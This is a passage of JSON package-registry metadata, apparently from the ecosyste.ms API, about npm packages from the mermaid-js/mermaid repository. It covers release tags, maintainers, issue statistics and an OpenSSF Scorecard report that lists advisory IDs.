rmaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.397Z","dependent_packages_count":0,"downloads":925,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":20.134237366340884,"dependent_repos_count":24.310564697539373,"dependent_packages_count":35.08014383070486,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":26.50831529819504},"purl":"pkg:npm/%40mermaid-js/examples","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/examples","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/examples","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/examples/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fexamples/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fexamples/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fexamples/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fexamples/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2025-07-02T10:52:53.617Z","updated_at":"2025-07-02T10:52:53.617Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2025-07-02T10:52:53.468Z","updated_at":"2025-07-02T10:52:53.468Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2025-07-02T10:52:53.516Z","updated_at":"2025-07-02T10:52:53.516Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2025-07-02T10:52:53.562Z","updated_at":"2025-07-02T10:52:53.562Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2025-07-02T10:52:53.711Z","updated_at":"2025-07-02T10:52:53.711Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2025-07-02T10:52:53.659Z","updated_at":"2025-07-02T10:52:53.659Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8437600,"name":"mermaid-eden","ecosystem":"npm","description":"Markdownish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":null,"versions_count":1,"first_release_published_at":"2023-10-16T13:19:59.920Z","latest_release_published_at":"2023-10-16T13:19:59.920Z","latest_release_number":"10.2.4","last_synced_at":"2025-09-01T12:55:57.866Z","created_at":"2023-10-16T15:18:13.820Z","updated_at":"2025-09-01T14:17:50.398Z","registry_url":"https://www.npmjs.com/package/mermaid-eden","install_command":"npm install mermaid-eden","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.2.4"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatar